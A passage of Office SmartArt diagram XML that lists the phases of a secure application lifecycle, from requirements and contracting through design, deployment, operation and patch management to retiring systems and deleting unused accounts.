    <dgm:cxn modelId="{9B1E24C1-9646-4B11-BED2-E864AE96290B}" type="presOf" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EDF5A9CC-CC5C-44FB-AD2F-4A9588D299B6}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" srcOrd="1" destOrd="0" parTransId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" sibTransId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}"/>
    <dgm:cxn modelId="{572A4DD0-8BB0-43D8-A35E-9D4C730E38BD}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{754476D4-7D8C-427D-8A6B-D0B60927777C}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}" srcOrd="2" destOrd="0" parTransId="{3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" sibTransId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}"/>
    <dgm:cxn modelId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" srcOrd="0" destOrd="0" parTransId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" sibTransId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}"/>
    <dgm:cxn modelId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" srcOrd="0" destOrd="0" parTransId="{EE435F92-04EC-45B6-94A8-51EF1EBF242B}" sibTransId="{1EBA831D-0061-461C-A1EF-795466184E12}"/>
    <dgm:cxn modelId="{85EDB1E7-A378-4F0C-B0F9-C3AC2705555F}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{024BBBE2-0706-4354-8AB0-3262009E8862}" srcOrd="2" destOrd="0" parTransId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" sibTransId="{C468EA37-5762-4D06-A4F9-E930ECF24341}"/>
    <dgm:cxn modelId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}" srcId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" destId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" srcOrd="0" destOrd="0" parTransId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" sibTransId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}"/>
    <dgm:cxn modelId="{5F96E2F6-EA13-4774-9421-1F0DDEB7BDED}" type="presOf" srcId="{ABA88485-4799-4A3E-A395-465F2466FC90}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F5234BFB-0653-49D4-A393-2589918EFE10}" type="presOf" srcId="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B1A30578-DD79-4939-A9F8-28AD03B8AD54}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6CB25451-4220-4743-96D9-4B8B3C4F99CD}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{617DA6D3-BEB8-4800-B1FC-98C29EF082A0}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9C6E9520-F5C2-41C7-A061-0140218D1DED}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A201EAD9-991A-486D-9848-464B08813756}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{36BB49A6-E6C7-4A97-BA09-E504B9A5CB87}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73C77C7A-7151-4540-A36C-02BAF86C1D7F}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6FF81300-4B71-426C-BE41-95BEFFB4F7EB}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C2CAE34C-DC3F-402B-9C24-F36E10DF6763}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1A025FFD-43A9-440F-BAC4-21396F32E15C}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{00B07580-E77C-441E-9EF2-B3E1DE4DA8D2}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3F81A852-98E1-4146-8C30-A1EE27A68299}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{C265CBBA-7FC7-4526-B04E-A83BFEDA4408}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{26135150-1EEE-452C-9216-92014AD56077}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{505F2738-E317-4DE0-968D-8CAB62E9FE6A}" type="presParOf" srcId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" destId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{98C8E5A8-9EB9-4BBF-9275-14B19FB13AD3}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D700CFC9-8390-4DFA-A6C1-CF888D9B4617}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D6106061-6CBE-4AC7-A61D-98FB10E8573B}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BDF4D38-2D31-4652-8413-675C17D298B1}" type="presParOf" srcId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>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pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Require-</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0" err="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ments</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> and Resource Management</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" tIns="46800" rIns="91440" bIns="46800"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" algn="l"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Collect and negotiate the business requirements for an application with the business, including receiving the protection requirements in regard to confidentiality, integrity and availability of all data assets</a:t>
          </a:r>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lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Request for Proposals (RFP) and Contracting</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BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Planning and </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Design</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91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" algn="l" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Negotiate planning and design with the developers and internal shareholders, e.g. security specialists</a:t>
          </a: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D8BFF34C-D8A4-48D2-87F1-8FB5BDCA60E8}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr tIns="46800" bIns="46800"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Compile the technical requirements including functional and non functional security requirements</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C951A6FC-5A1F-4857-A994-E74DBDDE7AAE}" type="parTrans" cxnId="{36350811-A542-4418-AC0D-3711E488E309}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BB27E93-EACB-4F04-B771-5BC97F2FBB8C}" type="sibTrans" cxnId="{36350811-A542-4418-AC0D-3711E488E309}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F29BADA4-D3E1-445A-AE44-24DE3C8F9939}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr tIns="46800" bIns="46800"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Plan and negotiate the budget that covers all aspects of design, build, testing and operation, including security activities</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4254352-B467-4BF2-A4D7-2F7CFAD0394C}" type="parTrans" cxnId="{674C597D-6DA4-4BA0-A9FB-FA1EAD437673}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A4E91D-E87A-4A4F-88AE-244970784DCC}" type="sibTrans" cxnId="{674C597D-6DA4-4BA0-A9FB-FA1EAD437673}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" i="0" u="none" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Retiring Systems</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="0" i="0" u="none" noProof="0" dirty="0">
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" type="parTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}" type="sibTrans" cxnId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B968349E-4C58-40FB-9DAA-E86B0E8ADE93}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="93600" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Securely close down the application, including deleting unused accounts and roles and permissions</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D72B57D-78FA-46C3-90C3-DB8D39C4BFCA}" type="parTrans" cxnId="{87492990-8C18-4693-A831-116F71427484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{988C5F79-5C09-40B3-9C2E-F9A0FC6AEDE9}" type="sibTrans" cxnId="{87492990-8C18-4693-A831-116F71427484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4FD9493-6B40-481C-9E80-8659803A617A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="93600" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Set your application’s state to retired in the CMDB</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC40E45E-4FF6-4571-BEC0-81444F39C475}" type="parTrans" cxnId="{9769FB35-9D24-40AA-9CAE-37C74F15F538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55661DBB-9DCD-441A-B239-7C2BFD543965}" type="sibTrans" cxnId="{9769FB35-9D24-40AA-9CAE-37C74F15F538}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="93600" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Operating including the security management for the application (e.g. patch management)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="900" baseline="0" noProof="0" dirty="0">
            <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" type="parTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}" type="sibTrans" cxnId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="93600" rIns="93600"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57600" indent="-57600" rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" baseline="0" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Implement business requirements for data retention (deletion) policies and securely archiving data</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C08C42A3-E914-4795-97F3-69296AA3F73D}" type="parTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7DE2A44-A11B-4BC7-BC1B-F6D335D0C9F6}" type="sibTrans" cxnId="{6E692FED-4175-4B9A-9596-6BB5008D4D8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Deployment, Testing and Rollout</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" type="sibTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" type="parTrans" cxnId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D62CD4F7-479B-4C4D-BE04-90F8D893259D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
